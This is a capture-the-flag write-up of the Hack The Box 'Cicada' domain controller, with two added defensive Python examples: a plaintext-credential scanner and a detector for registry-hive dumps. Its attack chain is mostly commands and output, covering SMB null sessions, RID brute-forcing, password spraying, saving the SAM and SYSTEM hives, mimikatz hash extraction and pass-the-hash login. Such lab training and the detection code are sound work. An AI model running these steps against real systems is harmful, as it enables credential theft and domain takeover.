My first hack the box writeup!

Cicada is definitely an awesome box for active directory beginners like me. XD

Target IP: 10.10.11.35

Reconnaissance

Of course the first step is nmap enumeration: nmap -p- --min-rate=10000 -Pn 10.10.11.35 to scan all ports, then nmap -sC -sV on the open ports to get service information.

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-10-01 21:58:05Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
61853/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-10-01T21:58:57
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 6h48m48s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 97.75 seconds

Looks like a Domain Controller, and the domain is cicada.htb. One thing worth noting in the host script results: the clock skew is almost seven hours. Kerberos rejects requests whose timestamp is more than five minutes off the KDC's clock, so anything Kerberos-based against this host needs the local clock synced to the DC first.

Got password, but what about username?

Listing the HR share over SMB with a null session gives us our first password, Cicada****!8, in Notice from HR.txt.

$ smbclient //10.10.11.35/HR -N  
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Thu Mar 14 08:29:09 2024
  ..                                  D        0  Thu Mar 14 08:21:29 2024
  Notice from HR.txt                  A     1266  Wed Aug 28 13:31:48 2024

-N tells smbclient not to prompt for a password (a null session).

I think the hardest part of this box is getting the first username. After reading some hints on the discussion forum, it turns out we need to brute-force RIDs:

$ nxc smb 10.10.11.35 -u 'guest' -p '' --rid-brute
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\guest: 
SMB         10.10.11.35     445    CICADA-DC        498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        500: CICADA\Administrator (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        501: CICADA\Guest (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        502: CICADA\krbtgt (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        512: CICADA\Domain Admins (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        513: CICADA\Domain Users (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        514: CICADA\Domain Guests (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        515: CICADA\Domain Computers (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        516: CICADA\Domain Controllers (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        517: CICADA\Cert Publishers (SidTypeAlias)
SMB         10.10.11.35     445    CICADA-DC        518: CICADA\Schema Admins (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        519: CICADA\Enterprise Admins (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        520: CICADA\Group Policy Creator Owners (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        521: CICADA\Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        525: CICADA\Protected Users (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        526: CICADA\Key Admins (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        527: CICADA\Enterprise Key Admins (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        553: CICADA\RAS and IAS Servers (SidTypeAlias)
SMB         10.10.11.35     445    CICADA-DC        571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.35     445    CICADA-DC        572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.35     445    CICADA-DC        1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1101: CICADA\DnsAdmins (SidTypeAlias)
SMB         10.10.11.35     445    CICADA-DC        1102: CICADA\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        1103: CICADA\Groups (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        1104: CICADA\john.smoulder (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1105: CICADA\sarah.dantelia (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1106: CICADA\michael.wrightson (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1108: CICADA\david.orelious (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1109: CICADA\Dev Support (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        1601: CICADA\emily.oscars (SidTypeUser)

And there we go, we got our potential usernames:

emily.oscars
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious

Now it’s time for password spraying.

$ nxc smb 10.10.11.35 -u users.txt  -p 'Cicada****!8' --continue-on-success
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\emily.oscars:Cicada****!8 STATUS_LOGON_FAILURE 
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\john.smoulder:Cicada****!8 STATUS_LOGON_FAILURE 
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\sarah.dantelia:Cicada****!8 STATUS_LOGON_FAILURE 
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada****!8 
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\david.orelious:Cicada****!8 STATUS_LOGON_FAILURE 
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\Administrator:Cicada****!8 STATUS_LOGON_FAILURE 
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\Guest:Cicada****!8 STATUS_LOGON_FAILURE 
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\krbtgt:Cicada****!8 STATUS_LOGON_FAILURE 

We get our first valid credential michael.wrightson:Cicada****!8.

Lesson learned: try all the netexec modules; maybe you'll get a hit someday. (?)

More credentials

I also tried the smb, wmi and ldap protocols in netexec to see whether we could execute commands as michael.wrightson, but no luck.

I also tried rpcclient for more user enumeration (maybe?).

$ rpcclient -U 'michael.wrightson%Cicada****!8' 10.10.11.35
michael.wrightson

rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[john.smoulder] rid:[0x450]
user:[sarah.dantelia] rid:[0x451]
user:[michael.wrightson] rid:[0x452]
user:[david.orelious] rid:[0x454]
user:[emily.oscars] rid:[0x641]

Nothing interesting here.

Remember that we can try all the netexec modules to see whether anything interesting turns up?

Yes! We got something interesting in an LDAP user description:

$ nxc ldap 10.10.11.35 -u "michael.wrightson"  -p 'Cicada****!8' -M get-desc-users
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.35     389    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada****!8 
GET-DESC... 10.10.11.35     389    CICADA-DC        [+] Found following users: 
GET-DESC... 10.10.11.35     389    CICADA-DC        User: Administrator description: Built-in account for administering the computer/domain
GET-DESC... 10.10.11.35     389    CICADA-DC        User: Guest description: Built-in account for guest access to the computer/domain
GET-DESC... 10.10.11.35     389    CICADA-DC        User: krbtgt description: Key Distribution Center Service Account
GET-DESC... 10.10.11.35     389    CICADA-DC        User: david.orelious description: Just in case I forget my password is aRt****!3

Again, password spraying gives us another credential david.orelious:aRt****!3. (Of course it’s his password XD)

However, we still cannot get a shell as david.orelious.

More, more credentials

Back to SMB: as david.orelious we can now read a new file on the DEV share, Backup_script.ps1.

$ nxc smb 10.10.11.35 -u "david.orelious"  -p 'aRt****!3' --get-file  'Backup_script.ps1' Backup_script.ps1 --share 'DEV'    
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)                                                                                                                           
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\david.orelious:aRt****!3 
SMB         10.10.11.35     445    CICADA-DC        [*] Copying "Backup_script.ps1" to "Backup_script.ps1"
SMB         10.10.11.35     445    CICADA-DC        [+] File "Backup_script.ps1" was downloaded to "Backup_script.ps1"

In Backup_script.ps1:

$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"

$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!****Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"

We got our third credential emily.oscars:Q!****Vt.
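Both credentials in this section leaked the same way: a plaintext secret sitting in data that many accounts can read (a user's LDAP description, then a script on a share). The following is an added example written for this writeup, not code from the original post or from the box: a small scanner with three regex rules that runs over a constructed PowerShell script shaped like Backup_script.ps1 and over a constructed set of user descriptions. Every password in the samples is a labelled placeholder, and the report masks whatever it finds so the scanner's own output does not re-leak the value.

```python
"""Scan scripts and directory attributes for plaintext credentials (added example)."""
import re

# Each rule captures the leaked value in a group named "secret".
RULES = [
    ("ConvertTo-SecureString -AsPlainText with a literal",
     re.compile(r'ConvertTo-SecureString\s+(?:-String\s+)?(["\'])(?P<secret>.+?)\1.*-AsPlainText', re.I)),
    ("password-like variable assigned a string literal",
     re.compile(r'\$\w*(?:pass|pwd|secret)\w*\s*=\s*(["\'])(?P<secret>.+?)\1', re.I)),
    ("'password is ...' phrasing in free text",
     re.compile(r'\b(?:password|passwd|pwd)\s*(?:is|:)\s*(?P<secret>\S+)', re.I)),
]

# Constructed script mirroring the shape of the backup script found on the box.
# The passwords are placeholders; the commented-out line is deliberately left
# in, because a secret in a comment is still a secret on disk.
SAMPLE_SCRIPT = r'''
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"

$username = "backup.svc"
$password = ConvertTo-SecureString "PLACEHOLDER-pass1" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)

# $pwd = "old-secret-in-comment"
$dbPwd = 'PLACEHOLDER-pass2'
$interactive = Read-Host -Prompt "Password" -AsSecureString
Compress-Archive -Path $sourceDirectory -DestinationPath "$destinationDirectory\backup.zip"
'''

# Constructed sAMAccountName -> description pairs, as an LDAP export would give them.
SAMPLE_DESCRIPTIONS = {
    "Administrator": "Built-in account for administering the computer/domain",
    "krbtgt": "Key Distribution Center Service Account",
    "svc.backup": "Just in case I forget my password is PLACEHOLDER-pass3",
    "jdoe": "Help desk, ext. 4412",
}


def mask(secret):
    """Keep only the first and last two characters of a found value."""
    if len(secret) <= 4:
        return "*" * len(secret)
    return secret[:2] + "*" * (len(secret) - 4) + secret[-2:]


def scan_text(text):
    """Return one finding per (line, rule) hit, with the value masked."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for name, rx in RULES:
            m = rx.search(line)
            if m:
                findings.append({"line": lineno, "rule": name,
                                 "value": mask(m.group("secret"))})
    return findings


def scan_descriptions(descriptions):
    """descriptions: {sAMAccountName: description}. Findings are tagged with the user."""
    findings = []
    for user, desc in descriptions.items():
        for f in scan_text(desc or ""):
            findings.append({"user": user, **f})
    return findings


if __name__ == "__main__":
    for f in scan_text(SAMPLE_SCRIPT):
        print(f"script line {f['line']}: {f['rule']} -> {f['value']}")
    for f in scan_descriptions(SAMPLE_DESCRIPTIONS):
        print(f"user {f['user']}: {f['rule']} -> {f['value']}")
```

The third rule is the noisy one ("password is required" would trip it), so in practice it is worth a second filter on the captured value, such as requiring a digit or symbol. The fix on the script side is the one Microsoft documents: keep the secret out of the file entirely (a credential store, a managed service account, or at least a DPAPI-protected Export-Clixml blob readable only by the account that runs the job), and remember that anyone who can read the share can read the script.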

Finally…

$ nxc winrm 10.10.11.35 -u 'emily.oscars' -p 'Q!****Vt' -X 'whoami'
WINRM       10.10.11.35     5985   CICADA-DC        [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb)
WINRM       10.10.11.35     5985   CICADA-DC        [+] cicada.htb\emily.oscars:Q!****Vt (Pwn3d!)
WINRM       10.10.11.35     5985   CICADA-DC        [+] Executed command (shell type: powershell)
WINRM       10.10.11.35     5985   CICADA-DC        cicada\emily.oscars

We got a shell!

Note: we use -X here to run a PowerShell command, since -x did not work.

Update: Actually evil-winrm is working, but at the time I was doing this box it just didn’t work…

Privilege Escalation

evil-winrm had some problem loading the shell (not sure why), so I just dropped a Meterpreter payload and got a callback.

Now how can we escalate our privilege?

Since this is an easy box, we don't need to think too much:

$ nxc winrm 10.10.11.35 -u 'emily.oscars' -p 'Q!****Vt' -X 'whoami /priv'
WINRM       10.10.11.35     5985   CICADA-DC        [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb)
WINRM       10.10.11.35     5985   CICADA-DC        [+] cicada.htb\emily.oscars:Q!****Vt (Pwn3d!)
WINRM       10.10.11.35     5985   CICADA-DC        [+] Executed command (shell type: powershell)
WINRM       10.10.11.35     5985   CICADA-DC        
WINRM       10.10.11.35     5985   CICADA-DC        PRIVILEGES INFORMATION
WINRM       10.10.11.35     5985   CICADA-DC        ----------------------
WINRM       10.10.11.35     5985   CICADA-DC        
WINRM       10.10.11.35     5985   CICADA-DC        Privilege Name                Description                    State
WINRM       10.10.11.35     5985   CICADA-DC        ============================= ============================== =======
WINRM       10.10.11.35     5985   CICADA-DC        SeBackupPrivilege             Back up files and directories  Enabled
WINRM       10.10.11.35     5985   CICADA-DC        SeRestorePrivilege            Restore files and directories  Enabled
WINRM       10.10.11.35     5985   CICADA-DC        SeShutdownPrivilege           Shut down the system           Enabled
WINRM       10.10.11.35     5985   CICADA-DC        SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
WINRM       10.10.11.35     5985   CICADA-DC        SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

SeBackupPrivilege and SeRestorePrivilege are enabled, which opens up a well-known privilege escalation technique: a process holding SeBackupPrivilege can read any file on the system regardless of its ACL, including the registry hives that hold local credential material.

The rest is just saving the SAM and SYSTEM hives and dumping the hashes.

c:\>mkdir aaa
c:\>cd aaa
c:\aaa>reg save hklm\sam c:\aaa\sam  
The operation completed successfully.
c:\aaa>reg save hklm\system c:\aaa\system
The operation completed successfully.
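Seen from the defender's side, the two reg save commands above are the noisiest part of this chain: with command-line auditing enabled (Windows Event ID 4688 with "Include command line in process creation events", or Sysmon Event ID 1) each one lands in the log as a reg.exe process creation. The following is an added example written for this writeup, not code from the original post: it runs a batch of constructed command-line records (users, paths and command lines are all made up) through a check for reg save / reg export of the SAM, SYSTEM or SECURITY hives, then collapses the hits per account, since SAM and SYSTEM together are what make offline hash extraction possible.

```python
"""Spot registry-hive dumps in process-creation telemetry (added example)."""
import re

# Constructed process-creation records, not from the box. Each carries the
# account that started the process and its command line.
SAMPLE_EVENTS = [
    {"user": r"CICADA\emily.oscars", "cmdline": r"reg save hklm\sam c:\aaa\sam"},
    {"user": r"CICADA\emily.oscars", "cmdline": r"reg  save hklm\system c:\aaa\system"},
    {"user": r"NT AUTHORITY\SYSTEM",
     "cmdline": r'"C:\Windows\System32\reg.exe" save HKLM\SOFTWARE\Policies C:\gpo\policies.hiv'},
    {"user": r"CICADA\jdoe", "cmdline": r"reg query hklm\system\currentcontrolset\services"},
    {"user": r"CICADA\backup.svc",
     "cmdline": r"reg.exe SAVE HKEY_LOCAL_MACHINE\SECURITY \\fileserver\backup\sec.hiv"},
]

# reg or reg.exe (bare or quoted full path) followed by the save/export subcommand.
REG_SAVE_RX = re.compile(r'(?:^|[\\\s"])reg(?:\.exe)?["\s]+(?:save|export)\b', re.I)
# The three hives that together hold local credential material.
HIVE_RX = re.compile(r'hk(?:lm|ey_local_machine)\\(sam|system|security)\b', re.I)


def dumped_hives(cmdline):
    """Hives a single command line saves, lower-cased; empty if it is not a reg save."""
    if not REG_SAVE_RX.search(cmdline):
        return []
    return sorted({h.lower() for h in HIVE_RX.findall(cmdline)})


def find_hive_dumps(events):
    """One alert per event whose command line saves a credential hive."""
    alerts = []
    for ev in events:
        hives = dumped_hives(ev["cmdline"])
        if hives:
            alerts.append({"user": ev["user"], "hives": hives, "cmdline": ev["cmdline"]})
    return alerts


def hives_by_user(alerts):
    """Collapse alerts per account so SAM+SYSTEM from the same user stands out."""
    per_user = {}
    for a in alerts:
        per_user.setdefault(a["user"], set()).update(a["hives"])
    return {user: sorted(hives) for user, hives in per_user.items()}


if __name__ == "__main__":
    found = find_hive_dumps(SAMPLE_EVENTS)
    for a in found:
        print(f"{a['user']}: saved {', '.join(a['hives'])} via: {a['cmdline']}")
    for user, hives in hives_by_user(found).items():
        if {"sam", "system"} <= set(hives):
            print(f"!! {user} saved both SAM and SYSTEM: local hashes are recoverable offline")
```

On the sample, the two saves by emily.oscars are the ones that matter; the SYSTEM-account save of a policy subkey and the plain reg query are left alone. The check is deliberately narrow (reg.exe only), so it complements rather than replaces object-access auditing on the SAM key itself, and the real fix is not the alert but the membership: a user who only needs to run a backup job should not be sitting in Backup Operators on a domain controller.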

Of course it's kiwi time. There is no antivirus, so I just dropped mimikatz on the box. For OPSEC you can instead download the two hives and dump the hashes locally with pypykatz.

mimikatz # lsadump::sam /system:C:\aaa\system /sam:C:\aaa\sam
Domain : CICADA-DC
SysKey : 3c2b033757a49110a9ee680b46e8d620
Local SID : S-1-5-21-47050115-2771739599-2321771406

SAMKey : a1c299e572ff8c643a857d3fdb3e5c7c

RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: 2b...41

RID  : 000001f5 (501)
User : Guest

RID  : 000001f7 (503)
User : DefaultAccount

RID  : 000001f8 (504)
User : WDAGUtilityAccount

Finally, we can use evil-winrm to login as Administrator.

$ evil-winrm -i 10.10.11.35 -u "Administrator" -H 2b...41
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
cicada\administrator

Successfully pwn3d the box!

Takeaways

  • Try all the modules in netexec; maybe you'll get a surprise. https://www.netexec.wiki/ is really helpful. I'm just an Active Directory Script Kiddie.

  • Enumerate more once you get a valid credential; maybe you'll find more interesting credentials.